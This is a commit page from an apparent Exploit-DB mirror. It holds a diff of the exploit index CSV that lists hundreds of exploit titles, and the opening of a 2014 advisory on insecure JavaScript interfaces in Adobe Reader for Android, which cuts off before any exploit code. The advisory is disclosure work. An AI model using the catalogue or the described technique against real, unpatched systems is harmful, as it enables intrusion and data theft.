bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 04_18_2014

Browse source
This commit is contained in:
Offensive Security 2014-04-18 04:35:42 +00:00
parent 544779d2f2
commit 46dd79985b
112 changed files with 3861 additions and 179 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

118
files.csv
View file

@ -8181,7 +8181,7 @@ id,file,description,date,author,platform,type,port
8675,platforms/php/webapps/8675.txt,"Ascad Networks 5 Products Insecure Cookie Handling Vulnerability",2009-05-14,G4N0K,php,webapps,0
8676,platforms/php/webapps/8676.txt,"My Game Script 2.0 (Auth Bypass) SQL Injection Vulnerability",2009-05-14,"ThE g0bL!N",php,webapps,0
8677,platforms/windows/dos/8677.txt,"DigiMode Maya 1.0.2 (.m3u / .m3l files) Buffer Overflow PoCs",2009-05-14,SirGod,windows,dos,0
8678,platforms/linux/local/8678.c,"Linux Kernel 2.6.29 ptrace_attach() Local Root Race Condition Exploit",2009-05-14,prdelka,linux,local,0
8678,platforms/linux/local/8678.c,"Linux Kernel 2.6.29 - ptrace_attach() Local Root Race Condition Exploit",2009-05-14,prdelka,linux,local,0
8679,platforms/php/webapps/8679.txt,"Shutter 0.1.1 - Multiple Remote SQL Injection Vulnerabilities",2009-05-14,YEnH4ckEr,php,webapps,0
8680,platforms/php/webapps/8680.txt,"beLive 0.2.3 (arch.php arch) - Local File Inclusion Vulnerability",2009-05-14,Kacper,php,webapps,0
8681,platforms/php/webapps/8681.php,"StrawBerry 1.1.1 LFI / Remote Command Execution Exploit",2009-05-14,[AVT],php,webapps,0
@ -16149,7 +16149,7 @@ id,file,description,date,author,platform,type,port
18690,platforms/php/webapps/18690.txt,"Buddypress plugin of Wordpress remote SQL Injection",2012-03-31,"Ivan Terkin",php,webapps,0
18691,platforms/windows/dos/18691.rb,"FoxPlayer 2.6.0 - Denial of Service",2012-04-01,"Ahmed Elhady Mohamed",windows,dos,0
18692,platforms/linux/dos/18692.rb,"SnackAmp 3.1.3 - (.aiff) Denial of Service",2012-04-01,"Ahmed Elhady Mohamed",linux,dos,0
18693,platforms/windows/local/18693.py,"BlazeVideo HDTV Player 6.6 Professional SEH&DEP&ASLR",2012-04-03,b33f,windows,local,0
18693,platforms/windows/local/18693.py,"BlazeVideo HDTV Player 6.6 Professional - SEH&DEP&ASLR",2012-04-03,b33f,windows,local,0
18694,platforms/php/webapps/18694.txt,"Simple PHP Agenda <= 2.2.8 CSRF (Add Admin - Add Event)",2012-04-03,"Ivano Binetti",php,webapps,0
18695,platforms/windows/remote/18695.py,"sysax <= 5.57 - Directory Traversal",2012-04-03,"Craig Freyman",windows,remote,0
18697,platforms/windows/remote/18697.rb,"NetOp Remote Control Client 9.5 - Buffer Overflow',",2012-04-04,metasploit,windows,remote,0
@ -22008,7 +22008,7 @@ id,file,description,date,author,platform,type,port
24869,platforms/php/webapps/24869.txt,"AContent 1.3 - Local File Inclusion",2013-03-22,DaOne,php,webapps,0
24870,platforms/php/webapps/24870.txt,"Flatnux CMS 2013-01.17 (index.php, theme param) - Local File Inclusion",2013-03-22,DaOne,php,webapps,0
24871,platforms/php/webapps/24871.txt,"Slash CMS - Multiple Vulnerabilities",2013-03-22,DaOne,php,webapps,0
24872,platforms/windows/local/24872.txt,"Photodex ProShow Producer 5.0.3310 ScsiAccess - Local Privilege Escalation",2013-03-22,"Julien Ahrens",windows,local,0
24872,platforms/windows/local/24872.txt,"Photodex ProShow Gold/Producer 5.0.3310 & 6.0.3410 - ScsiAccess Local Privilege Escalation",2013-03-22,"Julien Ahrens",windows,local,0
24873,platforms/php/webapps/24873.txt,"Stradus CMS 1.0beta4 - Multiple Vulnerabilities",2013-03-22,DaOne,php,webapps,0
24874,platforms/multiple/remote/24874.rb,"Apache Struts ParametersInterceptor Remote Code Execution",2013-03-22,metasploit,multiple,remote,0
24875,platforms/windows/remote/24875.rb,"Sami FTP Server LIST Command Buffer Overflow",2013-03-22,metasploit,windows,remote,0
@ -29470,7 +29470,7 @@ id,file,description,date,author,platform,type,port
32703,platforms/ios/webapps/32703.txt,"Private Photo+Video 1.1 Pro iOS - Persistent Vulnerability",2014-04-05,Vulnerability-Lab,ios,webapps,0
32704,platforms/windows/dos/32704.pl,"MA Lighting Technology grandMA onPC 6.808 - Remote Denial of Service (DOS) Vulnerability",2014-04-05,LiquidWorm,windows,dos,0
32705,platforms/windows/dos/32705.py,"EagleGet 1.1.8.1 - Denial of Service Exploit",2014-04-06,"Interference Security",windows,dos,0
32706,platforms/windows/dos/32706.txt,"Notepad++ DSpellCheck 1.2.12.0 - Denial of Service",2014-04-06,sajith,windows,dos,0
32706,platforms/windows/dos/32706.txt,"Notepad++ DSpellCheck v1.2.12.0 - Denial of Service",2014-04-06,sajith,windows,dos,0
32707,platforms/windows/dos/32707.txt,"InfraRecorder 0.53 - Memory Corruption [Denial of Service]",2014-04-06,sajith,windows,dos,0
32708,platforms/jsp/webapps/32708.txt,"Plunet BusinessManager 4.1 pagesUTF8/auftrag_allgemeinauftrag.jsp Multiple Parameter XSS",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0
32709,platforms/jsp/webapps/32709.txt,"Plunet BusinessManager 4.1 pagesUTF8/Sys_DirAnzeige.jsp Pfad Parameter Direct Request Information Disclosure",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0
@ -29483,7 +29483,7 @@ id,file,description,date,author,platform,type,port
32716,platforms/asp/webapps/32716.html,"Comersus Cart 6 User Email and User Password Unauthorized Access Vulnerability",2009-01-12,ajann,asp,webapps,0
32717,platforms/php/webapps/32717.pl,"Simple Machines Forum <= 1.1.5 Password Reset Security Bypass Vulnerability",2009-01-12,Xianur0,php,webapps,0
32718,platforms/php/webapps/32718.txt,"Ovidentia 6.7.5 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-01-12,"Ivan Sanchez",php,webapps,0
32721,platforms/php/webapps/32721.txt,"XAMPP 3.2.1 & phpMyAdmin 4.1.6 - Multiple Vulnerabilities",2014-04-07,"Mayank Kapoor",php,webapps,0
32721,platforms/php/webapps/32721.txt,"XAMPP 3.2.1 & phpMyAdmin 4.1.6 - Multiple Vulnerabilities",2014-04-07,hackerDesk,php,webapps,0
32723,platforms/hardware/remote/32723.txt,"Cisco IOS 12.x HTTP Server Multiple Cross Site Scripting Vulnerabilities",2009-01-14,"Adrian Pastor",hardware,remote,0
32724,platforms/php/webapps/32724.txt,"Dark Age CMS 2.0 'login.php' SQL Injection Vulnerability",2009-01-14,darkjoker,php,webapps,0
32725,platforms/windows/remote/32725.rb,"JIRA Issues Collector Directory Traversal",2014-04-07,metasploit,windows,remote,8080
@ -29530,9 +29530,11 @@ id,file,description,date,author,platform,type,port
32768,platforms/cgi/webapps/32768.pl,"PerlSoft Gästebuch Version: 1.7b 'admincenter.cgi' Remote Command Execution Vulnerability",2009-01-29,Perforin,cgi,webapps,0
32769,platforms/php/remote/32769.php,"PHP 5.2.5 'mbstring.func_overload' Webserver Denial Of Service Vulnerability",2009-01-30,strategma,php,remote,0
32770,platforms/php/webapps/32770.txt,"E-Php B2B Trading Marketplace Script Multiple Cross Site Scripting Vulnerabilities",2009-01-30,SaiedHacker,php,webapps,0
32771,platforms/windows/local/32771.txt,"Multiple Kaspersky Products 'klim5.sys' - Local Privilege Escalation Vulnerability",2009-02-02,"Ruben Santamarta ",windows,local,0
32772,platforms/windows/dos/32772.py,"Nokia Multimedia Player 1.1 '.m3u' File Heap Buffer Overflow Vulnerability",2009-02-03,zer0in,windows,dos,0
32773,platforms/php/webapps/32773.txt,"Simple Machines Forum <= 1.1.7 '[url]' Tag HTML Injection Vulnerability",2009-02-03,Xianur0,php,webapps,0
32774,platforms/multiple/dos/32774.txt,"QIP 2005 Malformed Rich Text Message Remote Denial of Service Vulnerability",2009-02-04,ShineShadow,multiple,dos,0
32775,platforms/linux/dos/32775.txt,"Linux Kernel 2.6.x - 'make_indexed_dir()' Local Denial of Service Vulnerability",2009-02-16,"Sami Liedes",linux,dos,0
32776,platforms/hardware/remote/32776.txt,"Cisco IOS 12.4(23) HTTP Server Multiple Cross Site Scripting Vulnerabilities",2009-02-04,Zloss,hardware,remote,0
32777,platforms/php/webapps/32777.html,"MetaBBS 0.11 Administration Settings Authentication Bypass Vulnerability",2009-02-04,make0day,php,webapps,0
32778,platforms/windows/local/32778.pl,"Password Door 8.4 Local Buffer Overflow Vulnerability",2009-02-05,b3hz4d,windows,local,0
@ -29545,7 +29547,7 @@ id,file,description,date,author,platform,type,port
32785,platforms/php/webapps/32785.txt,"Bitrix Site Manager 6/7 Multiple Input Validation Vulnerabilities",2009-02-09,aGGreSSor,php,webapps,0
32789,platforms/unix/remote/32789.rb,"Sophos Web Protection Appliance Interface Authenticated Arbitrary Command Execution",2014-04-10,metasploit,unix,remote,443
32790,platforms/php/webapps/32790.txt,"XCloner Standalone 3.5 - CSRF Vulnerability",2014-04-10,"High-Tech Bridge SA",php,webapps,80
32791,platforms/multiple/remote/32791.c,"Heartbleed OpenSSL Information Leak Exploit",2014-04-10,prdelka,multiple,remote,443
32791,platforms/multiple/remote/32791.c,"Heartbleed OpenSSL - Information Leak Exploit",2014-04-10,prdelka,multiple,remote,443
32792,platforms/php/webapps/32792.txt,"Orbit Open Ad Server 1.1.0 - SQL Injection",2014-04-10,"High-Tech Bridge SA",php,webapps,80
32793,platforms/windows/local/32793.rb,"MS14-017 Microsoft Word RTF Object Confusion",2014-04-10,metasploit,windows,local,0
32794,platforms/php/remote/32794.rb,"Vtiger Install Unauthenticated Remote Command Execution",2014-04-10,metasploit,php,remote,80
@ -29554,9 +29556,113 @@ id,file,description,date,author,platform,type,port
32797,platforms/asp/webapps/32797.txt,"Banking@Home 2.1 'Login.asp' Multiple SQL Injection Vulnerabilities",2009-02-10,"Francesco Bianchino",asp,webapps,0
32798,platforms/multiple/remote/32798.pl,"ProFTPD 1.3 'mod_sql' Username SQL Injection Vulnerability",2009-02-10,AlpHaNiX,multiple,remote,0
32799,platforms/windows/remote/32799.html,"Nokia Phoenix 2008.4.7 Service Software ActiveX Controls Multiple Buffer Overflow Vulnerabilities",2009-02-10,MurderSkillz,windows,remote,0
32800,platforms/linux/dos/32800.txt,"Poppler 0.10.3 - Multiple Denial of Service Vulnerabilities",2009-02-12,Romario,linux,dos,0
32801,platforms/hardware/remote/32801.txt,"Barracuda Load Balancer 'realm' Parameter Cross Site Scripting Vulnerability",2009-02-05,"Jan Skovgren",hardware,remote,0
32802,platforms/php/webapps/32802.txt,"ClipBucket 1.7 'dwnld.php' Directory Traversal Vulnerability",2009-02-16,JIKO,php,webapps,0
32803,platforms/php/webapps/32803.txt,"A4Desk Event Calendar 'eventid' Parameter SQL Injection Vulnerability",2008-10-01,r45c4l,php,webapps,0
32804,platforms/php/webapps/32804.txt,"lastRSS autoposting bot MOD 0.1.3 'phpbb_root_path' Parameter Remote File Include Vulnerability",2009-02-20,Kacper,php,webapps,0
32805,platforms/linux/local/32805.c,"Linux Kernel 2.6.x 'sock.c' SO_BSDCOMPAT Option Information Disclosure Vulnerability",2009-02-20,"Clément Lecigne",linux,local,0
32806,platforms/php/webapps/32806.txt,"Blue Utopia 'index.php' Local File Include Vulnerability",2009-02-22,PLATEN,php,webapps,0
32807,platforms/php/webapps/32807.txt,"Joomla! and Mambo gigCalendar Component 1.0 'banddetails.php' SQL Injection Vulnerability",2009-02-23,"Salvatore Fresta",php,webapps,0
32808,platforms/php/webapps/32808.txt,"Magento 1.2 app/code/core/Mage/Admin/Model/Session.php login[username] Parameter XSS",2009-02-24,"Loukas Kalenderidis",php,webapps,0
32809,platforms/php/webapps/32809.txt,"Magento 1.2 app/code/core/Mage/Adminhtml/controllers/IndexController.php email Parameter XSS",2009-02-24,"Loukas Kalenderidis",php,webapps,0
32810,platforms/php/webapps/32810.txt,"Magento 1.2 downloader/index.php URL XSS",2009-02-24,"Loukas Kalenderidis",php,webapps,0
32811,platforms/unix/remote/32811.txt,"Adobe Flash Player 9/10 - Invalid Object Reference Remote Code Execution Vulnerability",2009-02-24,"Javier Vicente Vallejo",unix,remote,0
32813,platforms/osx/local/32813.c,"Apple Mac OS X Lion Kernel <= xnu-1699.32.7 except xnu-1699.24.8 NFS Mount - Privilege Escalation Exploit",2014-04-11,"Kenzley Alphonse",osx,local,0
32814,platforms/php/webapps/32814.txt,"Sendy 1.1.9.1 - SQL Injection Vulnerability",2014-04-11,delme,php,webapps,0
32815,platforms/linux/local/32815.c,"Linux Kernel 2.6.x Cloned Process 'CLONE_PARENT' Local Origin Validation Weakness",2009-02-25,"Chris Evans",linux,local,0
32816,platforms/php/webapps/32816.txt,"Orooj CMS 'news.php' SQL Injection Vulnerability",2009-02-25,Cru3l.b0y,php,webapps,0
32817,platforms/osx/dos/32817.txt,"Apple Safari 4 Malformed 'feeds:' URI Null Pointer Dereference Remote Denial Of Service Vulnerability",2009-02-25,Trancer,osx,dos,0
32818,platforms/java/webapps/32818.txt,"JOnAS 4.10.3 'select' Parameter Error Page Cross Site Scripting Vulnerability",2009-02-25,"Digital Security Research Group",java,webapps,0
32819,platforms/php/webapps/32819.txt,"Parsi PHP CMS 2.0 'index.php' SQL Injection Vulnerability",2009-02-26,Cru3l.b0y,php,webapps,0
32820,platforms/linux/local/32820.txt,"OpenSC 0.11.x PKCS#11 Implementation Unauthorized Access Vulnerability",2009-02-26,"Andreas Jellinghaus",linux,local,0
32821,platforms/java/webapps/32821.html,"APC PowerChute Network Shutdown HTTP Response Splitting and Cross Site Scripting Vulnerabilities",2009-02-26,"Digital Security Research Group",java,webapps,0
32823,platforms/php/webapps/32823.txt,"Irokez Blog 0.7.3.2 Multiple Input Validation Vulnerabilities",2009-02-27,Corwin,php,webapps,0
32824,platforms/windows/dos/32824.pl,"Internet Download Manager 5.15 Build 3 Language File Parsing Buffer Overflow Vulnerability",2009-02-27,"musashi karak0rsan",windows,dos,0
32825,platforms/linux/remote/32825.txt,"djbdns 1.05 Long Response Packet Remote Cache Poisoning Vulnerability",2009-02-27,"Matthew Dempsky",linux,remote,0
32826,platforms/windows/remote/32826.html,"iDefense COMRaider Active X Control 'write()' Arbitrary File Overwrite Vulnerability",2009-03-02,"Amir Zangeneh",windows,remote,0
32827,platforms/php/webapps/32827.txt,"Afian 'includer.php' Directory Traversal Vulnerability",2009-03-02,vnbrain.net,php,webapps,0
32828,platforms/php/webapps/32828.txt,"Yektaweb Academic Web Tools CMS 1.4.2.8/1.5.7 Multiple Cross Site Scripting Vulnerabilities",2009-03-02,Isfahan,php,webapps,0
32829,platforms/linux/local/32829.c,"Linux Kernel 2.6.x 'seccomp' System Call Security Bypass Vulnerability",2009-03-02,"Chris Evans",linux,local,0
32830,platforms/php/webapps/32830.txt,"CubeCart 5.2.8 - Session Fixation",2014-04-13,absane,php,webapps,0
32831,platforms/php/webapps/32831.txt,"Microweber CMS 0.93 - CSRF Vulnerability",2014-04-13,sajith,php,webapps,0
32832,platforms/windows/remote/32832.c,"NovaStor NovaNET 12 'DtbClsLogin()' Remote Stack Buffer Overflow Vulnerability",2009-03-02,"AbdulAziz Hariri",windows,remote,0
32833,platforms/asp/webapps/32833.txt,"Blogsa 1.0 'Widgets.aspx' Cross Site Scripting Vulnerability",2009-03-02,DJR,asp,webapps,0
32834,platforms/linux/remote/32834.txt,"cURL/libcURL <= 7.19.3 HTTP 'Location:' Redirect Security Bypass Vulnerability",2009-03-03,"David Kierznowski",linux,remote,0
32835,platforms/php/webapps/32835.txt,"NovaBoard 1.0 HTML Injection and Cross-Site Scripting Vulnerabilities",2009-03-03,"Jose Luis Zayas",php,webapps,0
32836,platforms/multiple/dos/32836.html,"Mozilla Firefox 2.0.x Nested 'window.print()' Denial of Service Vulnerability",2009-03-03,b3hz4d,multiple,dos,0
32837,platforms/linux/remote/32837.py,"Wesnoth 1.x PythonAI Remote Code Execution Vulnerability",2009-02-25,Wesnoth,linux,remote,0
32838,platforms/linux/dos/32838.txt,"MySQL <= 6.0.9 XPath Expression Remote Denial Of Service Vulnerability",2009-02-14,"Shane Bester",linux,dos,0
32839,platforms/multiple/remote/32839.txt,"IBM WebSphere Application Server 6.1/7.0 Administrative Console Cross Site Scripting Vulnerability",2009-02-26,IBM,multiple,remote,0
32840,platforms/php/webapps/32840.txt,"Amoot Web Directory Password Field SQL Injection Vulnerability",2009-03-05,Pouya_Server,php,webapps,0
32841,platforms/php/webapps/32841.txt,"CMSCart 1.04 'maindatafunctions.php' SQL Injection Vulnerability",2009-02-28,"John Martinelli",php,webapps,0
32842,platforms/php/webapps/32842.txt,"UMI CMS 2.7 'fields_filter' Parameter Cross Site Scripting Vulnerability",2009-03-06,"Dmitriy Evteev",php,webapps,0
32843,platforms/php/webapps/32843.txt,"TinX CMS 3.5 'rss.php' SQL Injection Vulnerability",2009-03-06,"Dmitriy Evteev",php,webapps,0
32844,platforms/php/webapps/32844.txt,"PHORTAIL 1.2.1 'poster.php' Multiple HTML Injection Vulnerabilities",2009-03-09,"Jonathan Salwan",php,webapps,0
32845,platforms/windows/local/32845.pl,"IBM Director 5.20 CIM Server Privilege Escalation Vulnerability",2009-03-10,"Bernhard Mueller",windows,local,0
32846,platforms/php/webapps/32846.txt,"Nenriki CMS 0.5 'ID' Cookie SQL Injection Vulnerability",2009-03-10,x0r,php,webapps,0
32847,platforms/multiple/local/32847.txt,"PostgreSQL 8.3.6 Low Cost Function Information Disclosure Vulnerability",2009-03-10,"Andres Freund",multiple,local,0
32848,platforms/linux/local/32848.txt,"Sun xVM VirtualBox 2.0/2.1 Local Privilege Escalation Vulnerability",2009-03-10,"Sun Microsystems",linux,local,0
32849,platforms/linux/dos/32849.txt,"PostgreSQL <= 8.3.6 Conversion Encoding Remote Denial of Service Vulnerability",2009-03-11,"Afonin Denis",linux,dos,0
32850,platforms/windows/local/32850.txt,"Multiple SlySoft Products - Driver IOCTL Request Multiple Local Buffer Overflow Vulnerabilities",2009-03-12,"Nikita Tarakanov",windows,local,0
32851,platforms/windows/remote/32851.html,"MS14-012 Internet Explorer CMarkup Use-After-Free",2014-04-14,"Jean-Jamil Khalife",windows,remote,0
32852,platforms/php/webapps/32852.txt,"TikiWiki 2.2/3.0 'tiki-galleries.php' Cross Site Scripting Vulnerability",2009-03-12,iliz,php,webapps,0
32853,platforms/php/webapps/32853.txt,"TikiWiki 2.2/3.0 'tiki-list_file_gallery.php' Cross Site Scripting Vulnerability",2009-03-12,iliz,php,webapps,0
32854,platforms/php/webapps/32854.txt,"TikiWiki 2.2/3.0 'tiki-listpages.php' Cross Site Scripting Vulnerability",2009-03-12,iliz,php,webapps,0
32856,platforms/linux/dos/32856.txt,"MPlayer Malformed AAC File Handling DoS",2008-10-07,"Hanno Bock",linux,dos,0
32857,platforms/linux/dos/32857.txt,"MPlayer Malformed OGM File Handling DoS",2008-10-07,"Hanno Bock",linux,dos,0
32858,platforms/java/webapps/32858.txt,"Sun Java System Messenger Express 6.3-0.15 'error' Parameter Cross-Site Scripting Vulnerability",2009-03-17,syniack,java,webapps,0
32859,platforms/hardware/webapps/32859.txt,"Sagem Fast 3304-V2 - Authentification Bypass",2014-04-14,"Yassin Aboukir",hardware,webapps,0
32860,platforms/java/dos/32860.txt,"Sun Java System Calendar Server 6.3 Duplicate URI Request Denial of Service Vulnerability",2009-03-31,"SCS team",java,dos,0
32861,platforms/php/webapps/32861.txt,"WordPress Theme LineNity 1.20 - Local File Inclusion",2014-04-14,"felipe andrian",php,webapps,0
32862,platforms/java/webapps/32862.txt,"Sun Java System Calendar Server 6 'command.shtml' Cross Site Scripting Vulnerability",2009-03-31,"SCS team",java,webapps,0
32863,platforms/java/webapps/32863.txt,"Sun Java System Communications Express 6.3 'search.xml' Cross Site Scripting Vulnerability",2009-05-20,"SCS team",java,webapps,0
32864,platforms/java/webapps/32864.txt,"Sun Java System Communications Express 6.3 'UWCMain' Cross Site Scripting Vulnerability",2009-05-20,"SCS team",java,webapps,0
32865,platforms/multiple/dos/32865.py,"WhatsApp < v2.11.7 - Remote Crash",2014-04-14,"Jaime Sánchez",multiple,dos,0
32866,platforms/ios/webapps/32866.txt,"PDF Album v1.7 iOS - File Include Web Vulnerability",2014-04-14,Vulnerability-Lab,ios,webapps,0
32867,platforms/php/webapps/32867.txt,"Wordpress Quick Page/Post Redirect Plugin 5.0.3 - Multiple Vulnerabilities",2014-04-14,"Tom Adams",php,webapps,80
32868,platforms/php/webapps/32868.txt,"Wordpress Twitget Plugin 3.3.1 - Multiple Vulnerabilities",2014-04-14,"Tom Adams",php,webapps,80
32869,platforms/linux/webapps/32869.rb,"eScan Web Management Console Command Injection",2014-04-14,metasploit,linux,webapps,10080
32870,platforms/cgi/webapps/32870.txt,"AWStats <= 6.4 'awstats.pl' Multiple Path Disclosure Vulnerability",2009-04-19,r0t,cgi,webapps,0
32871,platforms/php/webapps/32871.txt,"ExpressionEngine 1.6 Avtaar Name HTML Injection Vulnerability",2009-03-22,"Adam Baldwin",php,webapps,0
32872,platforms/php/webapps/32872.txt,"PHPizabi 0.8 'notepad_body' Parameter SQL Injection Vulnerability",2009-03-24,Nine:Situations:Group::bookoo,php,webapps,0
32873,platforms/php/webapps/32873.txt,"PHPCMS2008 'ask/search_ajax.php' SQL Injection Vulnerability",2009-03-17,anonymous,php,webapps,0
32874,platforms/asp/webapps/32874.txt,"BlogEngine.NET 1.4 'search.aspx' Cross Site Scripting Vulnerability",2009-04-01,sk,asp,webapps,0
32875,platforms/php/webapps/32875.txt,"Comparison Engine Power 1.0 'product.comparision.php' SQL Injection Vulnerability",2009-03-25,SirGod,php,webapps,0
32876,platforms/novell/remote/32876.txt,"Novell NetStorage 2.0.1/3.1.5 Multiple Remote Vulnerabilities",2009-03-26,"Bugs NotHugs",novell,remote,0
32877,platforms/multiple/remote/32877.txt,"Xlight FTP Server <= 3.2 'user' SQL Injection Vulnerability",2009-03-19,fla,multiple,remote,0
32878,platforms/hardware/remote/32878.txt,"Cisco ASA Appliance 7.x/8.0 WebVPN Cross Site Scripting Vulnerability",2009-03-31,"Bugs NotHugs",hardware,remote,0
32879,platforms/windows/remote/32879.html,"SAP MaxDB 7.4/7.6 'webdbm' Multiple Cross Site Scripting Vulnerabilities",2009-03-31,"Digital Security Research Group",windows,remote,0
32880,platforms/php/webapps/32880.txt,"Turnkey eBook Store 1.1 'keywords' Parameter Cross Site Scripting Vulnerability",2009-03-31,TEAMELITE,php,webapps,0
32881,platforms/windows/dos/32881.py,"QtWeb Browser 2.0 Malformed HTML File Remote Denial of Service Vulnerability",2009-04-01,LiquidWorm,windows,dos,0
32882,platforms/asp/webapps/32882.txt,"SAP Business Objects Crystal Reports 7-10 'viewreport.asp' Cross Site Scripting Vulnerability",2009-04-02,"Bugs NotHugs",asp,webapps,0
32883,platforms/hardware/webapps/32883.txt,"NETGEAR N600 WIRELESS DUAL BAND WNDR3400 - Multiple Vulnerabilities",2014-04-15,"Santhosh Kumar",hardware,webapps,8080
32884,platforms/android/local/32884.txt,"Adobe Reader for Android 11.1.3 - Arbitrary JavaScript Execution",2014-04-15,"Yorick Koster",android,local,0
32885,platforms/unix/remote/32885.rb,"Unitrends Enterprise Backup 7.3.0 - Unauthenticated Root RCE",2014-04-15,"Brandon Perry",unix,remote,443
32886,platforms/hardware/webapps/32886.txt,"Xerox DocuShare - SQL Injection",2014-04-15,"Brandon Perry",hardware,webapps,8080
32887,platforms/php/webapps/32887.txt,"osCommerce 2.2/3.0 'oscid' Session Fixation Vulnerability",2009-04-02,laurent.desaulniers,php,webapps,0
32888,platforms/asp/webapps/32888.txt,"Asbru Web Content Management 6.5/6.6.9 SQL Injection and Cross Site Scripting Vulnerabilities",2009-04-02,"Patrick Webster",asp,webapps,0
32889,platforms/php/webapps/32889.txt,"4CMS SQL Injection and Local File Include Vulnerabilities",2009-04-02,k1ll3r_null,php,webapps,0
32890,platforms/unix/remote/32890.txt,"Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability",2009-04-01,"Richard H. Brain",unix,remote,0
32891,platforms/windows/local/32891.txt,"Microsoft Windows XP/VISTA/2003/2008 - WMI Service Isolation Local Privilege Escalation Vulnerability",2009-04-14,"Cesar Cerrudo",windows,local,0
32892,platforms/windows/local/32892.txt,"Microsoft Windows XP/2003 - RPCSS Service Isolation Local Privilege Escalation Vulnerability",2009-04-14,"Cesar Cerrudo",windows,local,0
32893,platforms/windows/local/32893.txt,"Microsoft Windows VISTA/2008 - Thread Pool ACL Local Privilege Escalation Vulnerability",2009-04-14,"Cesar Cerrudo",windows,local,0
32894,platforms/multiple/webapps/32894.txt,"IBM BladeCenter Advanced Management Module 1.42 Login username XSS",2009-04-09,"Henri Lindberg",multiple,webapps,0
32895,platforms/multiple/webapps/32895.txt,"IBM BladeCenter Advanced Management Module 1.42 private/file_management.ssi PATH Parameter XSS",2009-04-09,"Henri Lindberg",multiple,webapps,0
32896,platforms/multiple/webapps/32896.html,"IBM BladeCenter Advanced Management Module 1.42 CSRF",2009-04-09,"Henri Lindberg",multiple,webapps,0
32897,platforms/java/webapps/32897.txt,"Cisco Subscriber Edge Services Manager Cross Site Scripting And HTML Injection Vulnerabilities",2009-04-09,"Usman Saeed",java,webapps,0
32898,platforms/asp/webapps/32898.txt,"XIGLA Absolute Form Processor XE 1.5 'login.asp' SQL Injection Vulnerability",2009-04-09,"ThE g0bL!N",asp,webapps,0
32901,platforms/php/local/32901.php,"PHP 5.2.9 cURL 'safe_mode' and 'open_basedir' Restriction-Bypass Vulnerability",2009-04-10,"Maksymilian Arciemowicz",php,local,0
32902,platforms/windows/dos/32902.py,"Microsoft Internet Explorer 8 File Download Denial of Service Vulnerability",2009-04-11,"Nam Nguyen",windows,dos,0
32903,platforms/asp/webapps/32903.txt,"People-Trak Login SQL Injection Vulnerability",2009-04-13,Mormoroth.net,asp,webapps,0
32904,platforms/windows/remote/32904.rb,"MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free",2014-04-16,metasploit,windows,remote,0
32905,platforms/php/webapps/32905.txt,"LinPHA 1.3.2/1.3.3 login.php XSS",2009-04-09,"Gerendi Sandor Attila",php,webapps,0
32906,platforms/php/webapps/32906.txt,"LinPHA 1.3.2/1.3.3 new_images.php XSS",2009-04-09,"Gerendi Sandor Attila",php,webapps,0
32907,platforms/cgi/webapps/32907.txt,"Banshee 1.4.2 DAAP Extension 'apps/web/vs_diag.cgi' Cross Site Scripting Vulnerability",2009-04-13,"Anthony de Almeida Lopes",cgi,webapps,0
32908,platforms/multiple/webapps/32908.txt,"IBM Tivoli Continuous Data Protection for Files 3.1.4.0 Cross Site Scripting Vulnerability",2009-04-14,"Abdul-Aziz Hariri",multiple,webapps,0
32909,platforms/java/webapps/32909.txt,"Novell Teaming 1.0 User Enumeration Weakness and Multiple Cross Site Scripting Vulnerabilities",2009-04-15,"Michael Kirchner",java,webapps,0
32910,platforms/php/webapps/32910.txt,"Phorum 5.2 admin/badwords.php curr Parameter XSS",2009-04-16,voodoo-labs,php,webapps,0
32911,platforms/php/webapps/32911.txt,"Phorum 5.2 admin/banlist.php curr Parameter XSS",2009-04-16,voodoo-labs,php,webapps,0
32912,platforms/php/webapps/32912.txt,"Phorum 5.2 admin/users.php Multiple Parameter XSS",2009-04-16,voodoo-labs,php,webapps,0
32913,platforms/php/webapps/32913.txt,"Phorum 5.2 versioncheck.php upgrade_available Parameter XSS",2009-04-16,voodoo-labs,php,webapps,0
32914,platforms/php/webapps/32914.php,"Geeklog <= 1.5.2 'usersettings.php' SQL Injection Vulnerability",2009-04-16,Nine:Situations:Group::bookoo,php,webapps,0

Can't render this file because it is too large.

120
platforms/android/local/32884.txt Executable file
View file

@ -0,0 +1,120 @@
------------------------------------------------------------------------
Adobe Reader for Android exposes insecure Javascript interfaces
------------------------------------------------------------------------
Yorick Koster, April 2014
------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
Adobe Reader for Android [2] exposes several insecure Javascript
interfaces. This issue can be exploited by opening a malicious PDF in
Adobe Reader. Exploiting this issue allows for the execution of
arbitrary Java code, which can result in a compromise of the documents
stored in Reader and files stored on SD card.
------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully verified on Adobe Reader for Android
version 11.1.3.
------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
Adobe released version 11.2.0 of Adobe Reader that add
@JavascriptInterface [3] annotations to public methods that should be
exposed in the Javascript interfaces. In addition, the app now targets
API Level 17 and contains a static method
(shouldInitializeJavaScript()) that is used to check the device's
Android version.
http://www.securify.nl/advisory/SFY20140401/reader_11.2.0_release_notes.png
Figure 1: Adobe Reader for Android 11.2.0 release notes
------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
Adobe Reader for Android allows users to work with PDF documents on an
Android tablet or phone. According to Google Play, the app is installed
on 100 million to 500 million devices.
The following classes expose one or more Javascript interfaces:
- ARJavaScript
- ARCloudPrintActivity
- ARCreatePDFWebView
The app targets API Level 10, which renders the exposed Javascript
interfaces vulnerable to code execution - provided that an attacker
manages to run malicious Javascript code within Adobe Reader.
------------------------------------------------------------------------
PDF Javascript APIs
------------------------------------------------------------------------
It appears that Adobe Reader for Mobile supports [4] a subset of the
Javascript for Acrobat APIs. For some reason the exposed Javscript
objects are prefixed with an underscore character.
public class ARJavaScript
{
[...]
public ARJavaScript(ARViewerActivity paramARViewerActivity)
{
[...]
this.mWebView.addJavascriptInterface(new
ARJavaScriptInterface(this),
"_adobereader");
this.mWebView.addJavascriptInterface(new
ARJavaScriptApp(this.mContext), "_app");
this.mWebView.addJavascriptInterface(new ARJavaScriptDoc(),
"_doc");
this.mWebView.addJavascriptInterface(new
ARJavaScriptEScriptString(this.mContext), "_escriptString");
